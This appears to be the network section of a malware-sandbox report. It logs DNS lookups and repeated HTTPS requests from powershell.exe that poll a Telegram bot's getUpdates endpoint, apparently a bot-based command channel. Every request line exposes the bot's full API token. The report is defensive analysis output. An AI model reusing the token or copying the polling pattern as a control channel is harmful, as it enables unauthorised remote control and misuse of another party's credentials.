                                                                                Jan 14, 2025 10:06:40.935014009 CET64993443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:42.946449041 CET64994443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:42.946494102 CET44364994149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:42.946577072 CET64994443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:42.946947098 CET64994443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:42.946958065 CET44364994149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:43.579278946 CET44364994149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:43.580771923 CET64994443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:43.580800056 CET44364994149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:43.848866940 CET44364994149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:43.849056959 CET44364994149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:43.849113941 CET64994443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:43.849757910 CET64994443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:45.852669001 CET64995443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:45.852715015 CET44364995149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:45.852806091 CET64995443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:45.853218079 CET64995443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:45.853230000 CET44364995149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:46.468672991 CET44364995149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:46.470067024 CET64995443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:46.470110893 CET44364995149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:46.724730968 CET44364995149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:46.724822998 CET44364995149.154.167.220192.168.2.5
                                                                                Jan 14, 2025 10:06:46.726365089 CET64995443192.168.2.5149.154.167.220
                                                                                Jan 14, 2025 10:06:46.726942062 CET64995443192.168.2.5149.154.167.220
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Jan 14, 2025 10:03:44.253711939 CET6072953192.168.2.51.1.1.1
                                                                                Jan 14, 2025 10:03:44.260679960 CET53607291.1.1.1192.168.2.5
                                                                                Jan 14, 2025 10:03:56.387613058 CET5130653192.168.2.51.1.1.1
                                                                                Jan 14, 2025 10:04:12.187526941 CET5355401162.159.36.2192.168.2.5
                                                                                Jan 14, 2025 10:04:12.671838999 CET6031853192.168.2.51.1.1.1
                                                                                Jan 14, 2025 10:04:12.679003000 CET53603181.1.1.1192.168.2.5
                                                                                Jan 14, 2025 10:05:47.588433981 CET6241453192.168.2.51.1.1.1
                                                                                Jan 14, 2025 10:05:47.595669985 CET53624141.1.1.1192.168.2.5
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Jan 14, 2025 10:03:44.253711939 CET192.168.2.51.1.1.10xf0ddStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                Jan 14, 2025 10:03:56.387613058 CET192.168.2.51.1.1.10x30eStandard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                                                Jan 14, 2025 10:04:12.671838999 CET192.168.2.51.1.1.10x7b74Standard query (0)206.23.85.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                Jan 14, 2025 10:05:47.588433981 CET192.168.2.51.1.1.10xe2d2Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Jan 14, 2025 10:03:44.260679960 CET1.1.1.1192.168.2.50xf0ddNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                Jan 14, 2025 10:03:56.394758940 CET1.1.1.1192.168.2.50x30eNo error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                Jan 14, 2025 10:03:57.095407963 CET1.1.1.1192.168.2.50x6f3cNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                Jan 14, 2025 10:03:57.095407963 CET1.1.1.1192.168.2.50x6f3cNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                Jan 14, 2025 10:04:12.679003000 CET1.1.1.1192.168.2.50x7b74Name error (3)206.23.85.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                Jan 14, 2025 10:05:47.595669985 CET1.1.1.1192.168.2.50xe2d2No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                • api.telegram.org
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.549704149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:03:44 UTC232OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                Connection: Keep-Alive
                                                                                2025-01-14 09:03:45 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:03:45 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:03:45 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.549705149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:03:48 UTC208OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=124 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:03:48 UTC388INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:03:48 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 413
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:03:48 UTC413INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 7b 22 75 70 64 61 74 65 5f 69 64 22 3a 39 38 39 34 34 34 33 37 35 2c 0a 22 6d 65 73 73 61 67 65 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 32 31 32 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 39 36 37 39 30 36 30 36 32 2c 22 69 73 5f 62 6f 74 22 3a 66 61 6c 73 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 6b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6f 6e 22 2c 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 37 39 36 37 39 30 36 30 36 32 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 50 61 6b 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 53 6f 6e 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74
                                                                                Data Ascii: {"ok":true,"result":[{"update_id":989444375,"message":{"message_id":2126,"from":{"id":7967906062,"is_bot":false,"first_name":"Pak","last_name":"Son","language_code":"en"},"chat":{"id":7967906062,"first_name":"Pak","last_name":"Son","type":"private"},"dat


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.549725149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:03:59 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:04:02 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:04:02 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:04:02 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.549794149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:04:11 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:04:11 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:04:11 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:04:11 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.564791149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:04:14 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:04:17 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:04:17 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:04:17 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                5192.168.2.564862149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:04:25 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:04:28 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:04:28 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:04:28 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                6192.168.2.564944149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:04:38 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:04:42 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:04:42 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:04:42 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                7192.168.2.564975149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:04:47 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:04:50 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:04:50 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:04:50 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                8192.168.2.564976149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:04:57 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:00 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:00 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:00 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                9192.168.2.564977149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:03 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:06 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:06 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:06 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                10192.168.2.564978149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:09 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:09 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:09 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:09 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                11192.168.2.564979149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:12 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:12 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:12 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:12 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
                                                                                Data Ascii: {"ok":true,"result":[]}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                12192.168.2.564980149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:14 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:17 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:17 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:17 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                13192.168.2.564981149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:21 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:24 UTC344INHTTP/1.1 409 Conflict
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:24 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 143
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:24 UTC143INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 43 6f 6e 66 6c 69 63 74 3a 20 74 65 72 6d 69 6e 61 74 65 64 20 62 79 20 6f 74 68 65 72 20 67 65 74 55 70 64 61 74 65 73 20 72 65 71 75 65 73 74 3b 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 6f 6e 6c 79 20 6f 6e 65 20 62 6f 74 20 69 6e 73 74 61 6e 63 65 20 69 73 20 72 75 6e 6e 69 6e 67 22 7d
                                                                                Data Ascii: {"ok":false,"error_code":409,"description":"Conflict: terminated by other getUpdates request; make sure that only one bot instance is running"}


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                14192.168.2.564982149.154.167.2204433552C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                2025-01-14 09:05:33 UTC214OUTGET /bot7554307669:AAE_lnQTYSXvusaKlkpNrv2DvYuC7HhI0s0/getUpdates?offset=989444376 HTTP/1.1
                                                                                User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                Host: api.telegram.org
                                                                                2025-01-14 09:05:33 UTC387INHTTP/1.1 200 OK
                                                                                Server: nginx/1.18.0
                                                                                Date: Tue, 14 Jan 2025 09:05:33 GMT
                                                                                Content-Type: application/json
                                                                                Content-Length: 23
                                                                                Connection: close
                                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                Access-Control-Allow-Origin: *
                                                                                Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                2025-01-14 09:05:33 UTC23INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 5b 5d 7d
